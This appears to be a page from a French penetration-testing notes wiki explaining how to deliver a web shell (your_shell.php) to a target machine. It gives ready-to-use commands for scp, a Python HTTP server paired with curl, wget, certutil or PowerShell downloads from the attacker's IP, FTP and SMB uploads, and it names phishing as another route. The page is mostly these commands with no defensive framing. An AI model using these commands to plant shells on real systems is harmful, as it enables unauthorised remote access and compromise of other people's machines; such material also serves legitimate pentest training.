🚚Livrer un shell

📚 SCP (Secure Copy Protocol)

Utilisez SCP pour transférer un fichier depuis votre machine vers la cible. Assurez-vous d'avoir les droits d'accès appropriés sur la cible.

scp chemin/vers/your_shell.php utilisateur@cible_ip:/chemin/sur/la/cible

  • chemin/vers/your_shell.php : Le chemin local vers votre fichier shell.

  • utilisateur : Votre nom d'utilisateur sur la cible.

  • cible_ip : L'adresse IP de la cible.

  • /chemin/sur/la/cible : Le chemin sur la cible où vous souhaitez uploader le shell.

📋 Serveur Web

Si vous avez accès à un serveur Web sur la cible, vous pouvez également utiliser un serveur Web temporaire pour héberger votre shell et permettre à la cible de le télécharger.

  1. Sur votre machine, démarrez un serveur Web temporaire (par exemple, avec Python) dans le répertoire où se trouve votre shell :

    cd chemin/vers/repertoire
python3 -m http.server 8080

  2. Remplacez chemin/vers/repertoire par le chemin vers le répertoire contenant votre shell.

  3. Le port 8080 est utilisé ici, mais vous pouvez utiliser un autre port si nécessaire.

  4. Sur la cible, utilisez curl ou wget pour télécharger le shell depuis le serveur Web temporaire :

curl http://votre_ip:8080/your_shell.php -o your_shell.php

ou

wget http://votre_ip:8080/your_shell.php

  • Remplacez votre_ip par l'adresse IP de votre machine.

🛠️ Utilisation de Certutil (Windows)

Certutil est un utilitaire en ligne de commande sur Windows qui peut être utilisé pour télécharger des fichiers.

  1. Sur votre machine, démarrez un serveur Web temporaire :

    shCopier le codecd chemin/vers/repertoire
python3 -m http.server 8080

  2. Sur la cible, utilisez certutil pour télécharger le shell :

    shCopier le codecertutil -urlcache -split -f http://votre_ip:8080/your_shell.php your_shell.php

    • Remplacez votre_ip par l'adresse IP de votre machine.

🚀 PowerShell

PowerShell peut également être utilisé pour télécharger des fichiers.

  1. Sur votre machine, démarrez un serveur Web temporaire :

    shCopier le codecd chemin/vers/repertoire
python3 -m http.server 8080

  2. Sur la cible, utilisez PowerShell pour télécharger le shell :

    powershellCopier le codeInvoke-WebRequest -Uri http://votre_ip:8080/your_shell.php -OutFile your_shell.php

    ou

    powershellCopier le code(New-Object System.Net.WebClient).DownloadFile('http://votre_ip:8080/your_shell.php', 'your_shell.php')

🕵️ FTP

Si le service FTP est disponible sur la cible, vous pouvez transférer des fichiers en utilisant des commandes FTP.

  1. Sur la cible, démarrez une session FTP et connectez-vous au serveur :

    ftp votre_ip

  2. Une fois connecté, utilisez les commandes FTP pour uploader le shell :

    put chemin/vers/your_shell.php

    • Remplacez chemin/vers/your_shell.php par le chemin local vers votre fichier shell.

🧰 SMB

Si le partage de fichiers SMB est disponible, vous pouvez utiliser smbclient pour transférer des fichiers.

  1. Sur votre machine, utilisez smbclient pour accéder au partage SMB de la cible :

    smbclient //cible_ip/partage -U utilisateur

  2. Une fois connecté, utilisez les commandes SMB pour uploader le shell :

    put chemin/vers/your_shell.php

    • Remplacez chemin/vers/your_shell.php par le chemin local vers votre fichier shell.

Autres lmethodes : phishing, formulaire ou page web.

PreviousSocatNextPayload / shellcode

Last updated